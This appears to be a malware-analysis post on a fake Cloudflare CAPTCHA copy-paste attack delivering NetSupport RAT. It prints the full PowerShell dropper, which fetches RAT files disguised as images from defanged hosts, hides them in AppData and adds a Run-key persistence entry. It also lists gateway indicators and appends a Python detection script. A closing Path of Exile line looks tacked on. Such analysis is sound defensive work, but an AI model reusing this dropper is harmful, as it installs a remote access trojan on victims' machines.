Cloudflare CAPTCHA copy & paste malware NetSupport RAT
Hacked website redirects to eiesoft.com
https://urlscan.io/result/87495eb7-071f-499e-aeb5-a3b08b9f7e48/
"C:\windows\system32\mshta.exe" http://eiesoft[.]com/Ray-verify.html # ✅ ''Verify you are human - Ray Verification ID: xxx''1.0
which executes PowerShell that downloads NetSupport RAT:

ipconfig /flushdns
# random 6-letter folder under %APPDATA%, hidden with attrib +h
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | % {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath
$Pach = $randomFolderPath
$Run = 'HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
cmd /c attrib +h $Pach
# NetSupport components hosted as fake .png files
$url = "http://hardcorelegends[.]com/a/1.png"
$url2 = "http://hardcorelegends[.]com/a/2.png"
$url3 = "http://hardcorelegends[.]com/a/3.png"
$url4 = "http://hardcorelegends[.]com/a/4.png"
$url5 = "http://hardcorelegends[.]com/a/5.png"
$url6 = "http://hardcorelegends[.]com/a/6.png"
$url7 = "http://hardcorelegends[.]com/a/7.png"
$url8 = "http://hardcorelegends[.]com/a/8.png"
$url9 = "http://hardcorelegends[.]com/a/9.png"
$url10 = "http://hardcorelegends[.]com/a/10.png"
$url11 = "http://hardcorelegends[.]com/a/11.png"
$url12 = "http://hardcorelegends[.]com/a/12.png"
$file = $Pach + "\client32.ini"
$file2 = $Pach + "\HTCTL32.DLL"
$file3 = $Pach + "\msvcr100.dll"
$file4 = $Pach + "\nskbfltr.inf"
$file5 = $Pach + "\NSM.ini"
$file6 = $Pach + "\NSM.LIC"
$file7 = $Pach + "\pcicapi.dll"
$file8 = $Pach + "\PCICHEK.DLL"
$file9 = $Pach + "\PCICL32.DLL"
$file10 = $Pach + "\remcmdstub.exe"
$file11 = $Pach + "\TCCTL32.DLL"
$file12 = $Pach + "\client32.exe"
Invoke-WebRequest $url -OutFile $file
Invoke-WebRequest $url2 -OutFile $file2
Invoke-WebRequest $url3 -OutFile $file3
Invoke-WebRequest $url4 -OutFile $file4
Invoke-WebRequest $url5 -OutFile $file5
Invoke-WebRequest $url6 -OutFile $file6
Invoke-WebRequest $url7 -OutFile $file7
Invoke-WebRequest $url8 -OutFile $file8
Invoke-WebRequest $url9 -OutFile $file9
Invoke-WebRequest $url10 -OutFile $file10
Invoke-WebRequest $url11 -OutFile $file11
Invoke-WebRequest $url12 -OutFile $file12
start-sleep -s 4
# persistence: HKCU Run value named 'Microsoft' pointing at client32.exe
New-ItemProperty -Path $Run -Name 'Microsoft' -Value $file12
start-sleep -s 4
Start-Process $file12
NetSupport RAT Gateways
92.255.85[.]135
guidemytax[.]com
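Detection logic for the chain above, added here as an example (not code from the post): it scores process-creation events for the mshta copy-paste stage, the PowerShell download-and-persist stage and the indicators listed, and flags the resulting Run-key value. Event field names and sample inputs are constructed.

```python
import re

# Indicators copied from the post above (defanged as written there); refanged for matching.
LOADER_HOSTS = {"eiesoft[.]com", "hardcorelegends[.]com"}
RAT_GATEWAYS = {"92.255.85[.]135", "guidemytax[.]com"}
# Dropper layout: 6 random ASCII letters under %APPDATA%\Roaming, then client32.exe
NETSUPPORT_PATH = re.compile(r"\\appdata\\roaming\\[a-z]{6}\\client32\.exe$")


def refang(ioc):
    return ioc.replace("[.]", ".")


def classify_process(image, cmdline):
    """Return the reasons a process-creation event matches this ClickFix chain."""
    hits = []
    exe = image.lower().rsplit("\\", 1)[-1]
    cl = cmdline.lower()
    if exe == "mshta.exe" and re.search(r"https?://", cl):
        hits.append("mshta.exe started with a remote URL (copy-paste stage)")
    if exe in ("powershell.exe", "pwsh.exe"):
        if "invoke-webrequest" in cl and "appdata" in cl:
            hits.append("PowerShell downloads into %APPDATA%")
        if "currentversion\\run" in cl and "new-itemproperty" in cl:
            hits.append("PowerShell writes a Run-key value")
    for ioc in sorted(LOADER_HOSTS | RAT_GATEWAYS):
        if refang(ioc) in cl:
            hits.append(f"known indicator in command line: {ioc}")
    return hits


def classify_run_value(name, data):
    """Flag an HKCU Run value that launches NetSupport client32.exe from AppData."""
    if NETSUPPORT_PATH.search(data.lower()):
        return f"Run value '{name}' starts client32.exe from a random AppData folder"
    return None


if __name__ == "__main__":
    # constructed sample event mirroring the mshta line from the post
    print(classify_process(r"C:\windows\system32\mshta.exe",
                           r'"C:\windows\system32\mshta.exe" http://eiesoft.com/Ray-verify.html'))
    print(classify_run_value("Microsoft", r"C:\Users\bob\AppData\Roaming\QzYkLp\client32.exe"))
```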
Cloudflare CAPTCHA pop-ups can hide sneaky copy-paste malware that silently drops NetSupport RAT on your system without you noticing. If you're mapping your atlas in Path of Exile, be cautious: malicious RATs can steal your session and compromise your progress.